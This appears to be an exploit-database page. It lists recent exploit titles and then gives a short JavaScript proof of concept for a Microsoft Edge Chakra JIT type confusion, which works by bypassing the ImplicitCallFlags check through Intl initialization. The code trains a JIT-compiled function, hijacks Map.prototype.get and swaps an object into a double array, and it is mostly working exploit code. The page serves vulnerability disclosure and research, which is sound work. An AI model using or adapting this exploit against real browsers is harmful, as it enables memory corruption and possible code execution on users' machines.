
10 changes to exploits/shellcodes TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC) CEWE Photoshow 6.3.4 - Denial of Service (PoC) Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl Microsoft Edge Chakra JIT - Scope Parsing Type Confusion Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion OpenSSH 2.3 < 7.4 - Username Enumeration (PoC) Mikrotik WinBox 6.42 - Credential Disclosure (golang) Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit) Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection ADM 3.1.2RHG1 - Remote Code Execution
31 lines
No EOL
680 B
JavaScript
31 lines
No EOL
680 B
JavaScript
/*
|
|
If the Intl object hasn't been initialized, access to any property of it will trigger the initialization process which will run Intl.js. The problem is that it runs Intl.js without caring about the ImplicitCallFlags flag.
|
|
|
|
In the PoC, it redefines Map.prototype.get to intercept the execution of Intl.js.
|
|
|
|
PoC:
|
|
*/
|
|
|
|
function opt(arr, obj) {
|
|
arr[0] = 1.1;
|
|
obj.x;
|
|
arr[0] = 2.3023e-320;
|
|
}
|
|
|
|
let arr = [1.1];
|
|
for (let i = 0; i < 0x10000; i++) {
|
|
opt(arr, {});
|
|
}
|
|
|
|
let get = Map.prototype.get;
|
|
Map.prototype.get = function (key) {
|
|
Map.prototype.get = get;
|
|
|
|
arr[0] = {};
|
|
|
|
return this.get(key);
|
|
};
|
|
|
|
opt(arr, Intl);
|
|
|
|
alert(arr[0]); |